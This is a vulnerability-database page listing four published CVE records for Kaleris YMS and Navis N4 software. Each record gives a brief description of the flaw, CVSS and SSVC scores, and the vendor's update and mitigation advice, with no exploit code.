Search
Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
4 vulnerabilities by Kaleris
CVE-2026-31151 (GCVE-0-2026-31151)
Vulnerability from cvelistv5 – Published: 2026-04-06 00:00 – Updated: 2026-04-07 13:48
VLAI
Summary
An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application 's resources.
Severity
9.8 (Critical)
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- n/a
- CWE-288 - Authentication Bypass Using an Alternate Path or Channel
Assigner
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-31151",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-07T13:46:47.331460Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-288",
"description": "CWE-288 Authentication Bypass Using an Alternate Path or Channel",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T13:48:27.943Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application \u0027s resources."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-06T14:34:03.724Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://kaleris.com/solutions/yard-management/"
},
{
"url": "https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2026-31151",
"datePublished": "2026-04-06T00:00:00.000Z",
"dateReserved": "2026-03-09T00:00:00.000Z",
"dateUpdated": "2026-04-07T13:48:27.943Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-31150 (GCVE-0-2026-31150)
Vulnerability from cvelistv5 – Published: 2026-04-06 00:00 – Updated: 2026-04-06 15:02
VLAI
Summary
Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated attackers with only the shipping/receiving role to view the truck's dashboard resources.
Severity
4.3 (Medium)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
Assigner
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-31150",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-06T15:02:08.855352Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-284",
"description": "CWE-284 Improper Access Control",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-06T15:02:11.998Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated attackers with only the shipping/receiving role to view the truck\u0027s dashboard resources."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-06T14:32:02.551Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://kaleris.com/solutions/yard-management/"
},
{
"url": "https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31150"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2026-31150",
"datePublished": "2026-04-06T00:00:00.000Z",
"dateReserved": "2026-03-09T00:00:00.000Z",
"dateUpdated": "2026-04-06T15:02:11.998Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-5087 (GCVE-0-2025-5087)
Vulnerability from cvelistv5 – Published: 2025-06-24 18:30 – Updated: 2025-06-24 18:46
VLAI
Title
Cleartext Transmission of Sensitive Information in Kaleris Navis N4
Summary
Kaleris NAVIS N4 ULC (Ultra Light Client) communicates insecurely using zlib-compressed data over HTTP. An attacker capable of observing network traffic between Ultra Light Clients and N4 servers can extract sensitive information, including plaintext credentials.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-319 - Cleartext Transmission of Sensitive Information
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.cisa.gov/news-events/ics-advisories/i… | government-resource |
Date Public
2025-06-24 18:23
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-5087",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-06-24T18:46:10.854937Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-24T18:46:31.376Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Navis N4",
"vendor": "Kaleris",
"versions": [
{
"lessThan": "4.0",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"datePublic": "2025-06-24T18:23:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003e\u003c/p\u003e\n\n\u003cp\u003eKaleris NAVIS N4 ULC (Ultra Light Client) communicates insecurely using zlib-compressed data over HTTP. An attacker capable of observing network traffic between Ultra Light Clients and N4 servers can extract sensitive information, including plaintext credentials.\u003c/p\u003e"
}
],
"value": "Kaleris NAVIS N4 ULC (Ultra Light Client) communicates insecurely using zlib-compressed data over HTTP. An attacker capable of observing network traffic between Ultra Light Clients and N4 servers can extract sensitive information, including plaintext credentials."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-319",
"description": "CWE-319 Cleartext Transmission of Sensitive Information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-06-24T18:30:40.700Z",
"orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
"shortName": "icscert"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-175-01"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eKaleris recommends users to implement the following versions or later:\u003c/p\u003e\u003cul\u003e\u003cli\u003eNavis N4: Version 3.1.44+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.2.26+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.3.27+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.4.25+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.5.18+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.6.14+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.7.0+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.8.0+\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eIf users are unable to update, Kaleris recommends following these mitigations:\u003c/p\u003e\u003cul\u003e\u003cli\u003eIf N4 does not need to be exposed to the internet, placing it behind a firewall.\u003c/li\u003e\u003cli\u003eIf CAP needs to be exposed to the internet, disable the Ultra Light Client on the nodes being exposed. This can be done by blocking the Ultra Light Client URLs in the load balancer or firewall by blocking the following patterns: \"url-pattern*.jnlp\u0026lt;/url-pattern\" and \"url-pattern/ulc\u0026lt;/url-pattern\"\u003c/li\u003e\u003cli\u003eThe Ultra Light Client endpoint can also be disabled on the N4 Cluster node by commenting out relevant code in the web.xml file and restarting the server.\u003c/li\u003e\u003cli\u003eIf the Ultra Light Client must be exposed to the Internet, do one of the following:\u003cbr\u003ea. Set up a secure VPN connection to allow access for known external parties.\u003cbr\u003eb. Set up an authenticated jump system (Citrix, VDI, Etc.).\u003cbr\u003ec. Whitelist external allowed IPs. (least secure option)\u003c/li\u003e\u003cli\u003eAdditionally, the following controls should be applied:\u003cbr\u003ea. Restrict the number of N4 nodes exposed to the internet.\u003cbr\u003eb. Ensure that HTTPS is enabled and configured on the filewall/loadbalancer.\u003cbr\u003ec. Use a reliable third-party party firewall with built in DDOS protection that can detect unwanted intrusions.\u003c/li\u003e\u003cli\u003eUsers are required to implement TLS in their load balancer. The setup for this is included in the Application Security Guide that is provided to all users.\u003c/li\u003e\u003cli\u003eA final option to consider is upgrading to N4 4.0, where the Ultra Light Client has been fully replaced with the HTML UI.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eKaleris has sent a security advisory to all customers running Kaleris software.\u003c/p\u003e\u003cp\u003eFor more information, users should email \u003ca target=\"_blank\" rel=\"nofollow\"\u003esecurity@kaleris.com\u003c/a\u003e\u003c/p\u003e\n\n\u003cbr\u003e"
}
],
"value": "Kaleris recommends users to implement the following versions or later:\n\n * Navis N4: Version 3.1.44+\n * Navis N4: Version 3.2.26+\n * Navis N4: Version 3.3.27+\n * Navis N4: Version 3.4.25+\n * Navis N4: Version 3.5.18+\n * Navis N4: Version 3.6.14+\n * Navis N4: Version 3.7.0+\n * Navis N4: Version 3.8.0+\n\n\nIf users are unable to update, Kaleris recommends following these mitigations:\n\n * If N4 does not need to be exposed to the internet, placing it behind a firewall.\n * If CAP needs to be exposed to the internet, disable the Ultra Light Client on the nodes being exposed. This can be done by blocking the Ultra Light Client URLs in the load balancer or firewall by blocking the following patterns: \"url-pattern*.jnlp\u003c/url-pattern\" and \"url-pattern/ulc\u003c/url-pattern\"\n * The Ultra Light Client endpoint can also be disabled on the N4 Cluster node by commenting out relevant code in the web.xml file and restarting the server.\n * If the Ultra Light Client must be exposed to the Internet, do one of the following:\na. Set up a secure VPN connection to allow access for known external parties.\nb. Set up an authenticated jump system (Citrix, VDI, Etc.).\nc. Whitelist external allowed IPs. (least secure option)\n * Additionally, the following controls should be applied:\na. Restrict the number of N4 nodes exposed to the internet.\nb. Ensure that HTTPS is enabled and configured on the filewall/loadbalancer.\nc. Use a reliable third-party party firewall with built in DDOS protection that can detect unwanted intrusions.\n * Users are required to implement TLS in their load balancer. The setup for this is included in the Application Security Guide that is provided to all users.\n * A final option to consider is upgrading to N4 4.0, where the Ultra Light Client has been fully replaced with the HTML UI.\n\n\nKaleris has sent a security advisory to all customers running Kaleris software.\n\nFor more information, users should email security@kaleris.com"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Cleartext Transmission of Sensitive Information in Kaleris Navis N4",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
"assignerShortName": "icscert",
"cveId": "CVE-2025-5087",
"datePublished": "2025-06-24T18:30:40.700Z",
"dateReserved": "2025-05-22T15:55:28.362Z",
"dateUpdated": "2025-06-24T18:46:31.376Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-2566 (GCVE-0-2025-2566)
Vulnerability from cvelistv5 – Published: 2025-06-24 18:27 – Updated: 2025-06-24 18:47
VLAI
Title
Deserialization of Untrusted Data in Kaleris Navis N4
Summary
Kaleris NAVIS N4 ULC (Ultra Light Client) contains an unsafe Java deserialization vulnerability. An unauthenticated attacker can make specially crafted requests to execute arbitrary code on the server.
Severity
SSVC
Exploitation: none
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-502 - Deserialization of Untrusted Data
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.cisa.gov/news-events/ics-advisories/i… | government-resource |
Date Public
2025-06-24 18:23
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-2566",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-06-24T18:47:18.544221Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-24T18:47:46.713Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Navis N4",
"vendor": "Kaleris",
"versions": [
{
"lessThan": "4.0",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"datePublic": "2025-06-24T18:23:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eKaleris NAVIS N4 ULC (Ultra Light Client) contains an unsafe Java deserialization vulnerability. An unauthenticated attacker can make specially crafted requests to execute arbitrary code on the server.\u003c/p\u003e\u003cbr\u003e"
}
],
"value": "Kaleris NAVIS N4 ULC (Ultra Light Client) contains an unsafe Java deserialization vulnerability. An unauthenticated attacker can make specially crafted requests to execute arbitrary code on the server."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-502",
"description": "CWE-502 Deserialization of Untrusted Data",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-06-24T18:27:21.479Z",
"orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
"shortName": "icscert"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-175-01"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eKaleris recommends users to implement the following versions or later:\u003c/p\u003e\u003cul\u003e\u003cli\u003eNavis N4: Version 3.1.44+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.2.26+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.3.27+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.4.25+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.5.18+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.6.14+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.7.0+\u003c/li\u003e\u003cli\u003eNavis N4: Version 3.8.0+\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eIf users are unable to update, Kaleris recommends following these mitigations:\u003c/p\u003e\u003cul\u003e\u003cli\u003eIf N4 does not need to be exposed to the internet, placing it behind a firewall.\u003c/li\u003e\u003cli\u003eIf CAP needs to be exposed to the internet, disable the Ultra Light Client on the nodes being exposed. This can be done by blocking the Ultra Light Client URLs in the load balancer or firewall by blocking the following patterns: \"url-pattern*.jnlp\u0026lt;/url-pattern\" and \"url-pattern/ulc\u0026lt;/url-pattern\"\u003c/li\u003e\u003cli\u003eThe Ultra Light Client endpoint can also be disabled on the N4 Cluster node by commenting out relevant code in the web.xml file and restarting the server.\u003c/li\u003e\u003cli\u003eIf the Ultra Light Client must be exposed to the Internet, do one of the following:\u003cbr\u003ea. Set up a secure VPN connection to allow access for known external parties.\u003cbr\u003eb. Set up an authenticated jump system (Citrix, VDI, Etc.).\u003cbr\u003ec. Whitelist external allowed IPs. (least secure option)\u003c/li\u003e\u003cli\u003eAdditionally, the following controls should be applied:\u003cbr\u003ea. Restrict the number of N4 nodes exposed to the internet.\u003cbr\u003eb. Ensure that HTTPS is enabled and configured on the filewall/loadbalancer.\u003cbr\u003ec. Use a reliable third-party party firewall with built in DDOS protection that can detect unwanted intrusions.\u003c/li\u003e\u003cli\u003eUsers are required to implement TLS in their load balancer. The setup for this is included in the Application Security Guide that is provided to all users.\u003c/li\u003e\u003cli\u003eA final option to consider is upgrading to N4 4.0, where the Ultra Light Client has been fully replaced with the HTML UI.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eKaleris has sent a security advisory to all customers running Kaleris software.\u003c/p\u003e\u003cp\u003eFor more information, users should email \u003ca target=\"_blank\" rel=\"nofollow\"\u003esecurity@kaleris.com\u003c/a\u003e\u003c/p\u003e\n\n\u003cbr\u003e"
}
],
"value": "Kaleris recommends users to implement the following versions or later:\n\n * Navis N4: Version 3.1.44+\n * Navis N4: Version 3.2.26+\n * Navis N4: Version 3.3.27+\n * Navis N4: Version 3.4.25+\n * Navis N4: Version 3.5.18+\n * Navis N4: Version 3.6.14+\n * Navis N4: Version 3.7.0+\n * Navis N4: Version 3.8.0+\n\n\nIf users are unable to update, Kaleris recommends following these mitigations:\n\n * If N4 does not need to be exposed to the internet, placing it behind a firewall.\n * If CAP needs to be exposed to the internet, disable the Ultra Light Client on the nodes being exposed. This can be done by blocking the Ultra Light Client URLs in the load balancer or firewall by blocking the following patterns: \"url-pattern*.jnlp\u003c/url-pattern\" and \"url-pattern/ulc\u003c/url-pattern\"\n * The Ultra Light Client endpoint can also be disabled on the N4 Cluster node by commenting out relevant code in the web.xml file and restarting the server.\n * If the Ultra Light Client must be exposed to the Internet, do one of the following:\na. Set up a secure VPN connection to allow access for known external parties.\nb. Set up an authenticated jump system (Citrix, VDI, Etc.).\nc. Whitelist external allowed IPs. (least secure option)\n * Additionally, the following controls should be applied:\na. Restrict the number of N4 nodes exposed to the internet.\nb. Ensure that HTTPS is enabled and configured on the filewall/loadbalancer.\nc. Use a reliable third-party party firewall with built in DDOS protection that can detect unwanted intrusions.\n * Users are required to implement TLS in their load balancer. The setup for this is included in the Application Security Guide that is provided to all users.\n * A final option to consider is upgrading to N4 4.0, where the Ultra Light Client has been fully replaced with the HTML UI.\n\n\nKaleris has sent a security advisory to all customers running Kaleris software.\n\nFor more information, users should email security@kaleris.com"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Deserialization of Untrusted Data in Kaleris Navis N4",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
"assignerShortName": "icscert",
"cveId": "CVE-2025-2566",
"datePublished": "2025-06-24T18:27:21.479Z",
"dateReserved": "2025-03-20T16:48:15.650Z",
"dateUpdated": "2025-06-24T18:47:46.713Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}